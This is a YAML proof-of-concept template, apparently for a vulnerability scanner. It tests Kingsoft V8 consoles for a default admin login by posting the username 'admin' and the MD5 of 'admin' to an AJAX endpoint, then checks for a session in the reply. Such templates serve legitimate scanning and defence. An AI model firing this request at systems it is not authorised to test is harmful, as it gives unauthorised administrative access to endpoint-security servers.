name: poc-yaml-kingsoft-v8-default-password
rules:
  - method: POST
    path: /inter/ajax.php?cmd=get_user_login_cmd
    body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}"
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
detail:
  author: B1anda0(https://github.com/B1anda0)
  links:
    - https://idc.wanyunshuju.com/aqld/2123.html